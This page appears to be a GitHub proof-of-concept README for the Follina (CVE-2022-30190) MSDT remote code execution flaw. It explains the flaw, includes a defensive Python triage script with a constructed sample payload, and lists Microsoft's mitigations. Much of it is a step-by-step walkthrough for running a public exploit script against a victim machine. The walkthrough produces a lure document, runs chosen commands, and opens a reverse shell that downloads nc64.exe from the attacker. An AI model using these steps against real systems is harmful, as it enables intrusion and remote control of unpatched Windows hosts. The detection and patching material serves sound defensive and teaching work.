CVE-2022-30190 PoC — Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

Source
Associated Vulnerability
Title: Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)
Description: A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights. Please see the MSRC Blog Entry for important information about steps you can take to protect your system from this vulnerability.
Description
CVE-2022-30190 Proof-Of-Concept
Readme
## CVE?
CVE stands for Common Vulnerabilities and Exposures. It is a public catalogue that assigns a unique identifier (of the form CVE-YYYY-NNNNN) to each publicly disclosed vulnerability in a product, so that vendors, researchers and defenders share one consistent reference when they track, prioritise and manage their vulnerabilities.

## CVE-2022-30190 _a.k.a_ "Follina"
The vulnerability tracked as **CVE-2022-30190**, better known as **"Follina"**, alarmed the security community when it became public at the end of May 2022: it was a zero-day that was already being exploited in the wild. The flaw itself is in the Microsoft Windows Support Diagnostic Tool (MSDT), and Office (typically Word) is only the delivery vehicle. A malicious document references a remote HTML page through an external OLE object relationship; that page redirects to a crafted `ms-msdt:` URL, and MSDT then runs attacker-supplied PowerShell with the privileges of the user who opened the document. No macros are involved, so macro blocking and the "enable content" prompt do not help, and an RTF variant of the lure can even fire from the Windows Explorer preview pane without the file being opened at all.

Some sources about the discovery of CVE-2022-30190 :
- [cve.org](https://www.cve.org/CVERecord?id=CVE-2022-30190)
- [nvd.gov](https://nvd.nist.gov/vuln/detail/cve-2022-30190)
- [Medium](https://medium.com/@ajithcrajendran/follina-msdt-cve-2022-30190-aab6575c8224)
- [Wikipedia](https://id.wikipedia.org/wiki/CVE-2022-30190)
- [HackTheBox](https://www.hackthebox.com/blog/cve-2022-30190-follina-explained)
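The chain described above (external OLE relationship in the document, then an `ms-msdt:` URL in the remote HTML) is what a defender actually has to look for when triaging a suspicious file. The following Python script is an added example written for this page; it is not code from the msdt-follina project or from this README. Stage 1 unzips an OOXML document and reports every `oleObject` relationship marked `TargetMode="External"`; stage 2 extracts the `ms-msdt:` URI from a fetched HTML page, pulls out the diagnostic pack id, flags the `/../` path traversal, and decodes the base64 PowerShell carried in `IT_BrowseForFile`. Both inputs are constructed in-line to mirror the layout of the public PoC (the address `192.0.2.10:8000` and the command `Start-Process calc.exe` are assumptions), so the script runs offline with only the standard library.

```python
"""Triage helper for the Follina (CVE-2022-30190) delivery chain.

Added example, not code from the msdt-follina project or this README.
Stage 1 looks inside an OOXML document for the external oleObject
relationship that pulls the remote HTML; stage 2 parses that HTML for
the ms-msdt: URL and decodes the base64 PowerShell it carries.
Both inputs below are constructed to mirror the public PoC's layout;
192.0.2.10:8000 is a documentation address, not a real server.
"""
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
           "relationships/oleObject")

# Constructed word/_rels/document.xml.rels: the lure points its OLE object at a
# remote page (TargetMode="External"); the trailing "!" is how the PoC marks it.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL}"
      Target="http://192.0.2.10:8000/index.html!" TargetMode="External"/>
</Relationships>"""

# Constructed benign counterpart: an embedded object that stays in the package.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

# Constructed index.html in the shape the PoC serves: the PowerShell is base64
# inside IT_BrowseForFile, and the path traversal to mpsigstub.exe is what
# makes MSDT accept the parameter. PAYLOAD_CMD is an assumed sample command.
PAYLOAD_CMD = "Start-Process calc.exe"
SAMPLE_HTML = (
    '<!doctype html><html><body><script>\n'
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile='
    "$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58"
    "+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58"
    "+'FromBase64String('+[char]34+'"
    + base64.b64encode(PAYLOAD_CMD.encode()).decode()
    + "'+[char]34+'))'))))i/../../../../../../../../../../../../../../"
    'Windows/System32/mpsigstub.exe\\"";\n'
    "</script></body></html>\n"
)


def build_sample_docx(rels_xml: str) -> bytes:
    """Minimal OOXML zip holding only the parts the check reads (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def external_ole_targets(docx_bytes: bytes) -> list:
    """Stage 1: Target URLs of oleObject relationships marked External."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    hits.append(rel.get("Target", ""))
    return hits


def find_msdt_uris(html: str) -> list:
    """Stage 2a: ms-msdt: URIs written into a double-quoted JS string."""
    # Stop at the first unescaped double quote; \" inside the URI is allowed.
    return [m.group(0) for m in re.finditer(r'ms-msdt:(?:[^"\\]|\\.)*', html)]


def decode_msdt_payload(uri: str) -> dict:
    """Stage 2b: diagnostic pack id, traversal flag and decoded PowerShell."""
    info = {"id": None, "traversal": "/../" in uri, "command": None}
    m = re.search(r"/id\s+(\S+)", uri)
    if m:
        info["id"] = m.group(1)
    # The PoC wraps the base64 in [char]34 (a double quote) to avoid literal quotes.
    m = re.search(r"\[char\]34\+'([A-Za-z0-9+/=]+)'\+\[char\]34", uri)
    if m:
        info["command"] = base64.b64decode(m.group(1)).decode("utf-8", "replace")
    return info


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, "external OLE targets:", external_ole_targets(build_sample_docx(rels)))
    for uri in find_msdt_uris(SAMPLE_HTML):
        print("ms-msdt payload:", decode_msdt_payload(uri))
```

To use it on a real sample, pass the bytes of the suspect `.docx` (the `doc/` directory in the file snapshot below holds exactly the OOXML parts such a package contains) to `external_ole_targets`, and feed the HTML you retrieve from the reported target, in a sandbox, to `find_msdt_uris`. An external `oleObject` target on its own is rare in legitimate documents and is worth escalating even before the HTML is fetched.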

## Mitigation for CVE-2022-30190
Install the Windows security updates from June 14, 2022 or later; that Patch Tuesday release contains the fix for CVE-2022-30190. Until a host is patched, Microsoft's published workaround is to disable the MSDT URL protocol handler by exporting (as a backup) and then deleting the `HKEY_CLASSES_ROOT\ms-msdt` registry key, and Microsoft Defender customers can additionally enable the attack surface reduction rule that blocks Office applications from creating child processes. Keeping automatic updates switched on is the simplest way to stay covered.

Some resources on how to mitigate CVE-2022-30190 :
- [Microsoft Official Guidance](https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/)
- [SentinelOne](https://www.sentinelone.com/blog/staying-ahead-of-cve-2022-30190-follina/)

## Test Run on Virtual Machine
#### Tools and operating system used :
- Debian 12 as the attacker (host computer)
- Windows 10 build 19044.1288 (running on vm) as the victim
- VirtualBox
#### Things that should be considered :
- The attacks in this experiment were only performed on the same local network
- The attack can also be carried out from outside the network, since the document only needs to reach the attacker's HTTP server when it is opened, but that requires some extra setup (a publicly reachable address and port)
- The attack in this test was carried out with antivirus disabled on the victim's computer; up-to-date antivirus, including Microsoft Defender, flags this public PoC
- The attack only works on Windows 10 and 11 builds that have not installed the June 14, 2022 security updates (or later), which contain the fix
#### Usage :
Update the attacker's computer (host), which here runs Debian 12:
```
$ sudo apt update && sudo apt upgrade -y
```
Install git if it is not already installed
```
$ sudo apt install git
```
Install Python 3 if it is not already installed
```
$ sudo apt install python3
```
Install the "netifaces" module for Python 3 (follina.py uses it to find the attacker's IP address)
```
$ sudo apt install python3-netifaces
```
Clone the payload repository created by [John Hammond](https://github.com/JohnHammond/) and change into its directory
```
$ git clone https://github.com/JohnHammond/msdt-follina.git
$ cd msdt-follina
```
Run the payload generator. It writes _**follina.doc**_ into the msdt-follina directory and starts an HTTP server (port 8000 by default) that serves the HTML carrying the `ms-msdt:` payload; leave it running and copy _**follina.doc**_ to the victim's computer, because the document fetches that page from the attacker when it is opened
```
$ python3 follina.py
```
Open the _**follina.doc**_ file on the victim's computer
If the payload works, the Windows Calculator opens on the victim (the script's default command)

To run a different program, pass it with `-c` (here I'm using an example that opens the Notepad application)
```
$ python3 follina.py -c "notepad.exe"
```

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-36-11.png?raw=true)

To get a reverse shell instead, pass the listener port with `-r`; the payload then downloads the `nc64.exe` bundled in the repository from the attacker's HTTP server and connects back to that port
```
$ python3 follina.py -r 9999
```
If the reverse shell payload succeeds, you get a command prompt running on the victim's machine with the privileges of the user who opened the document, and you can run commands on the victim's computer from there

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-54-07.png?raw=true)

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-44-53.png?raw=true)

## Conclusions
Microsoft fixed this vulnerability in the June 14, 2022 security updates, but machines that are not kept up to date remain exploitable, as the test above shows on an unpatched Windows 10 build. So do not forget to keep your operating system updated and deny cybercriminals that opening. Cheers!

File Snapshot

```
[4.0K] /data/pocs/c3c2212b66eea46a0a672ee41ec84f146be6375a
├── [4.0K] msdt-follina
│   ├── [4.0K] doc
│   │   ├── [1.3K] [Content_Types].xml
│   │   ├── [4.0K] docProps
│   │   │   ├── [ 704] app.xml
│   │   │   └── [ 735] core.xml
│   │   └── [4.0K] word
│   │       ├── [3.8K] document.xml
│   │       ├── [1.5K] fontTable.xml
│   │       ├── [4.0K] _rels
│   │       │   └── [ 975] document.xml.rels
│   │       ├── [2.9K] settings.xml
│   │       ├── [ 29K] styles.xml
│   │       ├── [4.0K] theme
│   │       │   └── [6.6K] theme1.xml
│   │       └── [ 803] webSettings.xml
│   ├── [ 10K] follina.doc
│   ├── [5.0K] follina.py
│   ├── [ 44K] nc64.exe
│   └── [1.5K] README.md
├── [4.0K] pic
│   ├── [ 46K] Screenshot from 2024-11-25 21-36-11.png
│   ├── [ 44K] Screenshot from 2024-11-25 21-44-53.png
│   └── [ 97K] Screenshot from 2024-11-25 21-54-07.png
└── [4.4K] README.md

7 directories, 18 files
```